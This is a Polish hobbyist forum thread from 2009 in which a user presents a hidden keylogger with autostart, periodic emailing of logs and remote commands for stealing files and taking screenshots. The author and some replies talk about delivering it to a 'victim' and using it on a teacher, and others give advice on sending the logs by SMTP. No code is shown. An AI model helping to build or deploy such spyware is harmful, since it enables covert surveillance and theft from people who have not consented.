DoNcEr Opublikowano 6 Grudnia 2009 Udostępnij Opublikowano 6 Grudnia 2009 NAZWA: KLG 1.3 OPIS: Keylogger zapisujący wciskane klawisze. Działają duże, małe i polskie litery. Musiałem wyłączyć opcję Email bo był mój ustawiony. Program jest bezpieczny. Przy uruchomieniu ukrywa się więc żeby go pokazać należy wcisnąć CTRL + F4 Co o nim sądzicie ? Jakie błędy widzicie? Co byście dodali? te Kodowanie to taki zbędny dodatek narazie chciałem zrobić żeby od razu zapisywało do pliku zakodowany tekst. Mam opcję taką ze co 30 minut wysyła mi obecny tekst okna 1 + cały plik logu jako załącznik. Plik tworzy się tam gdzie jest program *exe AUTOR: Damian2208(doncer) WAGA: 416 KB SCREEN: DOWNLOAD: POBIERZ V.1.3 INFO POSTĘPU PRACY 25.12.2009 wersja beta 1.5 niestety nie daję demka będzie tylko wersja finalna Zmiany w wersji 1.5: *Dodano komendy GG: -wyłączanie komputera -otwieranie,zamykanie cd-roomu -pobieranie pliku według określonej ścieżki (np. można zdobyć archiwa Nowego GG,lub dowolny plik na pulpicie jeśli znamy jego nazwę) - podglądanie memo -czyszczenie okna memo - robienie zrzutu ekranu - odbieranie zrzutu na emaila - zamykanie programu komendą - wyłączanie monitora(czuwanie), włączanie - kasowanie,tworzenie logu -kasowanie pliku zrzutu - włączanie dźwięku Logowania XP - zamienianie przycisków myszy * Inny skrót do pokazania formy * Poprawiono błąd zapisywania Logów * Autostart z systemem * zmieniono komponent gg na nowy (odbieranie, wysyłanie działa bez zarzutu!) * półgodzinne wysyłanie logów na email (zawartość memo + plik Log) POWSTAŁ TEŻ PROGRAM DO OBSŁUGI KTÓRY WYGLĄDA TAK: Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
IamTheLaw Opublikowano 6 Grudnia 2009 Udostępnij Opublikowano 6 Grudnia 2009 1)Twój keylogger nie wpisuje znaków typu @ 2)Włącz funkcję wysyłania na email 3)Czasem zaczyna pisać od początku górnego okna litery i cyfry (tutaj już działa @) ale niestety pisze odwrotnie. Nie tyczy się to klawiszy typu pagu up/ page down itp Dopracuj to trochę Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 6 Grudnia 2009 Udostępnij Opublikowano 6 Grudnia 2009 po co Ci tam dwa okienka? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
DoNcEr Opublikowano 6 Grudnia 2009 Autor Udostępnij Opublikowano 6 Grudnia 2009 Na drugim okienku robie sobie rózne testy. od nowa piszesz bo klikasz w memo i dodatkowo wyłapuje klawisze.To bedzie zablokowane właściwością OnlyRead,na razie tak jest wygodniej.Dorabiam opcje wysyłania komend przez gg hm znaczka @ sprawdzę bo nie zauwazyłem EDIT :ok Zrobiłem tak że SHIFT daje w memo {LEFT SHIFT} lub {RIGHT SHIFT} Email wiem jak dla siebie zrobić nie wiem jak zrobic by kazdy sobie mógł wpisac swoje dane. Potem musiałby generowac program do wysłania ofierze i tego juz nie wiem tez Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Administratorzy gnysek Opublikowano 6 Grudnia 2009 Administratorzy Udostępnij Opublikowano 6 Grudnia 2009 Zapisywać mejla w rejestrze / pliku ini? Jak nie ma wpisu, to o niego prosić. Edit... no tak, ale z wysłaniem komuś problem jest. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 6 Grudnia 2009 Udostępnij Opublikowano 6 Grudnia 2009 jakieś okienko lub chociaż pop-up, gdzie user będzie mógł zdefiniować swojego maila i hasło. Musisz napisać sobie obsługę protokołu smtp http://sieci-komputerowe.w.interia.pl/referaty/pliki/r07.pdf albo znaleźć gotowca/dll w google :) E: http://www.elektroda.pl/rtvforum/topic336151.html Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
zelman Opublikowano 7 Grudnia 2009 Udostępnij Opublikowano 7 Grudnia 2009 Ja mam buga: napisałem + a on napisał to jako =. Sprawdziłem jeszcze raz, czy nie napisałem =, ale napisałem + :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
DoNcEr Opublikowano 7 Grudnia 2009 Autor Udostępnij Opublikowano 7 Grudnia 2009 Zelman już było. Trzeba patrzeć jeśli jest '{RIGHT SHIFT}=' to znaczy że ofiara pisze '+' Spróbuje z tym plikiem INI.No jeszcze ten problem z podesłaniem pliku ofierze;> to jest zawsze największy problem. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
marker Opublikowano 7 Grudnia 2009 Udostępnij Opublikowano 7 Grudnia 2009 No, no piekielnie fajny program :) W szkole bedzie jazda :] wychowawczyni(od informatyki) ma przerypane :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
DoNcEr Opublikowano 7 Grudnia 2009 Autor Udostępnij Opublikowano 7 Grudnia 2009 Hehe ,poczekajcie na wersję finalną w tej nie ma autostaru jeszcze. Obecnie mam już to zrobione Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Grzegosz_X Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 Trochę nubski ten keylogger, i dużo waży. Sam zrobiłem sobie pr0h4x0rskieg0 keyloggera z wysyłaniem na stronkę itp i ważył tylko 12kB ;p Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PsichiX Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 to udowodnij pr0mistrzu Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Grzegosz_X Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 Ja go skończę to wstawię. PS.: Wysyłanie na mail to fail. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PsichiX Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 to jak bym powiedzial: "ja jestem najlepszym ######stym tworca gier i moja gra wymiata, ale pokaze jak ja skończę" ;0 Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Grzegosz_X Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 Nie mówię że jestem najlepszy tylko mówię że może być lepiej, bo wiem że może ;p Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PsichiX Opublikowano 8 Grudnia 2009 Udostępnij Opublikowano 8 Grudnia 2009 ale cwaniakowanie i tak nie wypada ;p mniejsza o to, ja i tak nie zamierzam testowac zadnych keylogerow, nawet tych 'bezpiecznych', z racji ze nowe zagrozenie nie jest od razu wykrywane przez programy blokujace ataki/spyware i wole nie ryzykowac :> swoja droga, jak bym zrobil taki programik to nie chwalil bym sie bo to logiczne ze szybciej znajdzie sie na nie zabezpieczenie :P takie rzeczy robi sie dla siebie lub udostepnia sie waskiej zamknietej grupie, nie publikuje ;p Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
zelman Opublikowano 9 Grudnia 2009 Udostępnij Opublikowano 9 Grudnia 2009 Albo mi sie tylko wydaje, albo plik z logiem jest pusty... nie zapełnia się. Tak specjalnie? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
DoNcEr Opublikowano 25 Grudnia 2009 Autor Udostępnij Opublikowano 25 Grudnia 2009 Albo mi sie tylko wydaje, albo plik z logiem jest pusty... nie zapełnia się. Tak specjalnie? Tak miałeś rację Zelman błąd występował bo nie zostały podane ścieżki pliku, tylko sama nazwa Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi